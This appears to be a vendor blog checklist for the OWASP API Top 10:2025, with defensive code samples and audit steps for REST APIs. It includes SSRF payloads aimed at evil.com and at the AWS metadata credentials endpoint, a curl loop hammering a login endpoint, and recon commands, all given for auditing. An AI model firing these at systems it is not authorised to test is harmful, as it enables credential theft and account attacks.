CAI Technology
aegis · 8 min read

OWASP API Top 10:2025 — Complete Checklist for RESTful APIs

APIs differ from traditional web apps. The OWASP API Top 10:2025 lists the most critical risk categories and how to validate them.

CAI Technology · Last reviewed: 5/9/2026

In Short

APIs (REST, GraphQL) differ from traditional web applications: they lack a UI to hide implementation details, directly expose business logic, process large volumes of data, and rely on token-based authentication. The OWASP API Security Top 10:2025 classifies the 10 most critical risk categories in the API landscape.

In 2026, ~70% of significant breaches involve an API vulnerability (Akamai 2024 report). Every day APIs expose credit cards, medical records, location data, and credentials; without a UI to “hide” the data, everything is accessible if the endpoint is not properly protected.

This checklist is for the dev + security team building or auditing RESTful or GraphQL APIs.

OWASP API Top 10:2025 — Complete List

API1:2025 — Broken Object Level Authorization (BOLA / IDOR)

The most frequent API vulnerability. The endpoint /api/v1/users/12345/profile returns the profile of user ID 12345—but does not verify if the authenticated user has the right to view that profile.

The attacker sends ?id=12346, ?id=12347, etc. → enumerates all profiles.

Verification: for every endpoint with an ID in the URL, verify:

API2:2025 — Broken Authentication

Predictable JWT tokens, lack of rate limiting on /login, password reset with plain links (no TTL), session fixation, lack of MFA for sensitive accounts.

Verification: test with Hydra/Burp Suite on endpoints /login, /reset, /refresh. Check token TTL, rate limits, and MFA for admins.

API3:2025 — Broken Object Property Level Authorization (BOLA + Mass Assignment)

Endpoint PATCH /api/v1/users/12345 accepts payload {role: "admin"} and updates the DB directly. The user self-promotes to admin.

Verification: explicit allowlist of editable fields per endpoint. Frameworks (Rails strong_params, Express express-validator) have dedicated patterns.
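An added example (not the article's or any framework's code) showing the two checks API1 and API3 require in one PATCH handler: first that the caller may touch the object at all, then that the caller's role may write each submitted field. The roles, allowlists and user records are constructed for the demo.

```python
from __future__ import annotations
from dataclasses import dataclass, field

# Constructed per-role allowlist of writable fields on a user object.
# A plain user can never reach "role", so {"role": "admin"} is refused.
WRITABLE_FIELDS = {
    "user": {"display_name", "email"},
    "admin": {"display_name", "email", "role", "is_locked"},
}

@dataclass
class User:
    id: int
    role: str
    attrs: dict = field(default_factory=dict)

class Forbidden(Exception):
    """Object-level authorization failed (maps to 403)."""

def authorize_object(actor: User, target: User) -> None:
    """API1 (BOLA): the ID in the URL is not proof of ownership.
    Only the owner or an admin may modify the target."""
    if actor.id != target.id and actor.role != "admin":
        raise Forbidden(f"user {actor.id} may not modify user {target.id}")

def filter_writable(actor: User, payload: dict):
    """API3 (mass assignment): split the payload into fields the actor's
    role may set and fields it may not. Returns (accepted, rejected)."""
    allowed = WRITABLE_FIELDS.get(actor.role, set())
    accepted = {k: v for k, v in payload.items() if k in allowed}
    rejected = set(payload) - allowed
    return accepted, rejected

def patch_user(actor: User, target: User, payload: dict) -> dict:
    """Simulates PATCH /api/v1/users/{id}. Unknown or forbidden fields
    reject the whole request (400) rather than being dropped silently,
    so attempts show up in logs instead of disappearing."""
    authorize_object(actor, target)
    accepted, rejected = filter_writable(actor, payload)
    if rejected:
        raise ValueError(
            f"fields not writable by role {actor.role!r}: {sorted(rejected)}")
    target.attrs.update(accepted)
    return target.attrs

if __name__ == "__main__":
    alice = User(12345, "user")
    print(patch_user(alice, alice, {"display_name": "Alice"}))
```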

API4:2025 — Unrestricted Resource Consumption

Endpoint /api/v1/search?limit=999999 returns 999,999 results. CPU + DB brought to their knees.

Verification: hard limit on pagination (limit ≤ 100), rate limiting per user/IP, timeout per request, queue prioritization.

API5:2025 — Broken Function Level Authorization (BFLA)

/api/v1/admin/users/12345/delete accessible by a user with role user—not just admin. Privilege escalation.

Verification: systematically test all admin endpoints with a user session. Use role-based access control (RBAC) middleware at the framework level.

API6:2025 — Unrestricted Access to Sensitive Business Flows

/api/v1/cart/checkout accepts reservations without rate limiting. An attacker bot makes 10,000 reservations for popular events → business DoS.

Verification: identify key business flows + add CAPTCHA / device fingerprinting / friction.

API7:2025 — Server Side Request Forgery (SSRF)

POST /api/v1/upload-from-url {"url": "http://evil.com/payload"} → your server performs a GET to an external URL. Attacker sends "url": "http://169.254.169.254/latest/meta-data/iam/credentials" → AWS metadata service → IAM credentials.

Verification: allowlist domains, deny localhost, 169.254.0.0/16 (cloud metadata), 10.0.0.0/8, 192.168.0.0/16 (internal).
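The allowlist-plus-denylist check described above, as an added example that is not part of the original article. The hostname allowlist and the DNS table are constructed so it runs offline; in production swap in a real resolver and check every returned address.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed hostname allowlist: the primary control for API7.
ALLOWED_HOSTS = {"cdn.example.com", "images.example.com"}

# Ranges the article says to deny, plus the remaining private/IPv6 ones.
DENY_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10",
)]

# Constructed DNS table; a real resolver returns every A/AAAA record and
# all of them must pass (one internal record is enough to refuse).
FAKE_DNS = {
    "cdn.example.com": ["203.0.113.10"],
    "images.example.com": ["203.0.113.20", "10.0.0.5"],
}

def is_forbidden_ip(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped  # ::ffff:169.254.169.254 -> 169.254.169.254
    return any(addr in net for net in DENY_NETS)

def check_outbound_url(url: str, resolver=lambda h: FAKE_DNS.get(h, [])):
    """Return (ok, reason) for a URL the server is asked to fetch."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    try:
        ipaddress.ip_address(host)
    except ValueError:
        pass  # a hostname: fall through to the allowlist
    else:
        # Literal IPs never match the allowlist; name the internal case
        # explicitly so it stands out in the logs.
        if is_forbidden_ip(host):
            return False, f"literal address {host} is internal or link-local"
        return False, "literal IP addresses are not allowed"
    if host not in ALLOWED_HOSTS:
        return False, f"host {host!r} not in allowlist"
    addrs = resolver(host)
    if not addrs:
        return False, f"host {host!r} did not resolve"
    for ip in addrs:
        if is_forbidden_ip(ip):
            return False, f"{host} resolves to internal address {ip}"
    return True, "ok"
```

Because a hostname can resolve differently between the check and the fetch (DNS rebinding), connect to the address you validated rather than re-resolving, and disable automatic redirect following or re-run the check on each redirect target.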

API8:2025 — Security Misconfiguration

Verbose errors in production (stack trace with DB schema), Access-Control-Allow-Origin: * with Allow-Credentials: true, lack of HSTS on API endpoints, exposed debug endpoints.

Verification: full scan of headers + response body for info disclosure.
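One way to run the header and body scan for the API8 items listed above, as an added example (not the article's tooling). The captured response is constructed; feed it the raw responses Burp or ZAP saved for you.

```python
import re

# Constructed 500 response from a hypothetical Express/Sequelize backend.
SAMPLE_RESPONSE = {
    "status": 500,
    "headers": {
        "Access-Control-Allow-Origin": "*",
        "Access-Control-Allow-Credentials": "true",
        "X-Powered-By": "Express",
        "Content-Type": "text/html",
    },
    "body": ('SequelizeDatabaseError: relation "users" does not exist\n'
             '    at Query.run (/app/node_modules/sequelize/lib/query.js:50:25)'),
}

# Body patterns that indicate a stack trace or a schema leak.
DISCLOSURE_PATTERNS = [
    (r"\bat \S+ \([^)]*:\d+:\d+\)", "JS stack frame in body"),
    (r"Traceback \(most recent call last\)", "Python traceback in body"),
    (r'relation "\w+"|Table \'\w+\'|\bSELECT\b.*\bFROM\b', "DB schema detail in body"),
]

def scan_response(resp, over_https=True, request_origin=None):
    """Return a list of API8 findings for one captured response.
    Pass request_origin (an origin you control and the API should not
    trust) to detect origin reflection, which is the exploitable CORS case."""
    h = {k.lower(): v for k, v in resp["headers"].items()}
    findings = []
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao == "*" and creds:
        findings.append("CORS: wildcard origin combined with credentials")
    if request_origin and acao == request_origin and creds:
        findings.append(f"CORS: reflects untrusted origin {request_origin} with credentials")
    if over_https and "strict-transport-security" not in h:
        findings.append("HSTS header missing")
    for hdr in ("server", "x-powered-by"):
        if hdr in h:
            findings.append(f"technology disclosure via {hdr}: {h[hdr]}")
    body = resp.get("body", "")
    for pattern, label in DISCLOSURE_PATTERNS:
        if re.search(pattern, body):
            findings.append(label)
    if resp["status"] >= 500 and not h.get("content-type", "").startswith("application/json"):
        findings.append("5xx error not returned as structured JSON (raw error page?)")
    return findings

if __name__ == "__main__":
    for finding in scan_response(SAMPLE_RESPONSE):
        print("-", finding)
```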

API9:2025 — Improper Inventory Management

/api/v1/users deprecated but still active; /api/v0/internal/admin left over from testing; staging.api.firma.ro publicly accessible with production data.

Verification: exhaustive inventory of public APIs (incl. legacy + staging) + clear sunset policy for old versions.

API10:2025 — Unsafe Consumption of APIs

Your API consumes third-party APIs (Stripe, Twilio, etc.) and integrates the data into responses without validation. If the third party is compromised, the attacker’s payload reaches your users.

Verification: validate + sanitize all data coming from external APIs before returning it to users.

API Audit Implementation

Step 1 — Endpoint Inventory

Complete listing of endpoints:

# OpenAPI / Swagger spec extraction
curl https://firma.ro/openapi.json | jq '.paths | keys'

# Discovery via crawl + Wayback
katana -u https://api.firma.ro -d 3
gau api.firma.ro

Step 2 — Test each endpoint with user + admin session

For every combination (endpoint, role):

  1. Test without auth → must return 401 or 403
  2. Test with user role → check BOLA + BFLA
  3. Test with admin role → check expected behavior

Step 3 — Test schema validation

Send malformed payloads:

Step 4 — Test rate limiting

# Bursting
for i in {1..1000}; do curl -X POST https://api.firma.ro/login -d 'user=admin&pass=test'; done

Expected: 429 Too Many Requests after N requests.

Step 5 — Test SSRF

For endpoints with URL/file input:

curl -X POST https://api.firma.ro/upload-from-url \
  -H 'Content-Type: application/json' \
  -d '{"url": "http://169.254.169.254/latest/meta-data/"}'

Expected: 400 Bad Request or explicit filter.

ARTEMIS API Audit (in 2026 roadmap)

ARTEMIS extends the audit_type catalog with a dedicated api type for OWASP API Top 10 — available Q3 2026. Until then, manual audit with Burp + ZAP is recommended.

